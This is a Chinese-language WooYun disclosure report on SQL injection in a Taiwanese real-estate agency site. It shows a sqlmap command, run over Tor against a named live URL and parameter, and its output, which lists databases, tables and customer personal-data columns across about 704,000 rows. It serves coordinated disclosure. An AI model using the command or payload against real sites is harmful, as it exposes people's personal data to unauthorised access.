当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136711

漏洞标题:台湾某房产中介网站SQL注入/影响70万用户信息

相关厂商:21世纪不动产

漏洞作者: 路人甲

提交时间:2015-08-25 02:21

修复时间:2015-10-09 10:40

公开时间:2015-10-09 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

台湾某房产中介网站SQL注入/影响70万用户信息

详细说明:

台湾某房产中介网站SQL注入/影响70万用户信息

漏洞证明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://www.century21.com.tw/js/ug_AreaMap_xml.asp"  --data="selCity=22" 
---
Parameter: selCity (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selCity=22 AND 3116=3116
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    False
available databases [19]:
[*] 21Online
[*] [Smart eVision]
[*] B2B
[*] BatchService
[*] C21Online
[*] C21Online_Backup
[*] Convention
[*] mailhunter
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] RMS_Analysis
[*] RMSDB   ======>只影响这一个资料库
[*] RMSDB_Testing
[*] SYSDB
[*] tempdb
[*] WMBDB
[13:52:56] [INFO] fetching tables for database: RMSDB
[13:52:56] [INFO] fetching number of tables for database 'RMSDB'
[13:52:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:52:56] [INFO] retrieved: 373
[13:53:20] [INFO] retrieved: dbo.2100Store
[13:55:56] [INFO] retrieved: dbo.AppleExport
[13:58:41] [INFO] retrieved: dbo.B2B_ObjectSQL
[14:01:17] [INFO] retrieved: dbo.Booking_Notice
[14:03:53] [INFO] retrieved: dbo.BookingObjectDown
[14:06:42] [INFO] retrieved: dbo.Building
[14:08:54] [INFO] retrieved: dbo.Bulletin
[14:10:32] [INFO] retrieved: dbo.BusinessMessage
[14:13:23] [INFO] retrieved: dbo.CalculatePersonalDeal
[14:17:43] [INFO] retrieved: dbo.CalculatePersonalDeal_bak
[14:19:23] [INFO] retrieved: dbo.CalculateStoreDeal
[14:21:38] [INFO] retrieved: dbo.ChineseCalendar
[14:24:33] [INFO] retrieved: dbo.Circulate_Cit^[y
[14:27:26] [INFO] retrieved: dbo.Circulate_DenialStore
[14:30:01] [INFO] retrieved: dbo.Circulate_Group
[14:31:29] [INFO] retrieved: dbo.Circulate_Store
[14:33:09] [INFO] retrieved: dbo.ContractCategory
[14:36:23] [INFO] retrieved: dbo.ContractMgnt
[14:37:40] [INFO] retrieved: dbo.CPI
[14:38:18] [INFO] retrieved: dbo.CPI_BAK
[14:39:22] [INFO] retrieved: dbo.Customer
[14:41:10] [INFO] retrieved: dbo.CustomerGroup
[14:42:32] [INFO] retrieved: dbo.CustomerGroupRelation
[14:45:40] [INFO] retrieved: dbo.CustomerOperator
[14:48:17] [INFO] retrieved: dbo.CutPriceNotice
[14:51:39] [INFO] retrieved: dbo.CutPriceRe^C
<...就到这里了...boolean-based blind的注入太费劲>
[14:54:33] [INFO] fetching columns for table 'Customer' in database 'RMSDB'
[14:54:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:54:33] [INFO] retrieved: 51
[14:54:49] [INFO] retrieved: Address
[14:56:19] [INFO] retrieved: nvarchar
[14:57:59] [INFO] retrieved: Adult
[14:59:06] [INFO] retrieved: tinyint
[15:00:36] [INFO] retrieved: Birthday
[15:02:17] [INFO] retrieved: smalldatetime
[15:04:44] [INFO] retrieved: BuyStatus
[15:06:31] [INFO] retrieved: tinyint
[15:07:52] [INFO] retrieved: Child
[15:08:56] [INFO] retrieved: tinyint
[15:10:18] [INFO] retrieved: Client_Address  ===>地址
[15:13:11] [INFO] retrieved: nvarchar
[15:15:22] [INFO] retrieved: Client_Birthday
[15:18:04] [INFO] retrieved: smalldatetime
[15:20:26] [INFO] retrieved: Client_District
[15:23:06] [INFO] retrieved: nvarchar
[15:24:32] [INFO] retrieved: Client_Email  ===>邮箱
[15:26:56] [INFO] retrieved: nvarchar
[15:28:22] [INFO] retrieved: Client_Fax
[15:30:20] [INFO] retrieved: nvarchar
[15:31:44] [INFO] retrieved: Client_Gender
[15:34:04] [INFO] retrieved: nvarchar
[15:35:44] [INFO] retrieved: Client_HomePhone
[15:38:38] [INFO] retrieved: nvarchar
[15:40:18] [INFO] retrieved: Client_Mobile1   ===>电话
[15:43:06] [INFO] retrieved: nvarchar
[15:44:42] [INFO] retrieved: Client_Mobile2
[15:47:39] [INFO] retrieved: nvarchar
[15:49:09] [INFO] retrieved: Client_Name  ==>名字
[15:51:44] [INFO] retrieved: nvarchar
[15:53:36] [INFO] retrieved: Client_OfficePhone
[15:57:25] [INFO] retrieved: nvarchar
[15:58:54] [INFO] retrieved: Client_PID
[16:00:53] [INFO] retrieved: nvarchar
[16:02:21] [INFO] retrieved: Company^C
<...就到这里了...boolean-based blind的注入太费劲>
Database: RMSDB
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.Customer | 704343  |   ====>70万用户
+--------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-25 10:38

厂商回复:

感謝通知!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-25 10:53 | Wulala ( 普通白帽子 | Rank:227 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

    台湾人效率就是高